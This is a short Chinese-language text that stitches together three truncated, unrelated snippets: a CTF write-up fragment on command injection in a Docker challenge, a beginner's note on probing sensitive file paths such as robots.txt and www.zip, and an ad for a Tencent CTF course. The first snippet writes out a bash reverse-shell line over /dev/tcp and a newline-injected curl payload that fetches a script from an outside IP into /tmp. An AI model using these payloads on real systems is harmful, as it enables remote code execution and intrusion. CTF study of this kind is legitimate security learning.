由于docker是没有bash、python程序的,并且sh反弹是不行的。 bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 目前是能通过折中的方式执行任意命令 编写1.sh 请求bash到tmp目录 127.0.0.1%0acurl your_buu_ip/1.sh > /tmp/1.sh #请求bash文件到tmp目录 127.0.0.1%0acurl 117.21.200.166/1.sh > /tmp/1....
docker ps 发现有端口80 直接用浏览器打开127.0.0.1:80 解题 看到书上说,有几个常规的敏感文件地址可以尝试 highlighter- cmd robots.txtreadme.mdwww.zip/rar/tar.gz 依次试了一下,第一个地址有信息 接着打开 得到flag1 又捣鼓了半天(把书上的工具,方法一个个试),没能找到另外两个,于是去搜题解 发现他...
TCTF公开课第一期:大神与你聊CTF从0到1。分享时代下的网络安全,TCTF的那些故事,一个CTFer的成长历程和带你走进腾讯安全。 分享嘉宾及主题 讲师 课程内容 课程大纲 董志强 熊猫烧香终结者腾讯安全云鼎实验室掌门人 时代下的网络安全 1、分享个人在信息安全领域的经验; 2、新基建下的网络安全前景,以及万物上云的时代...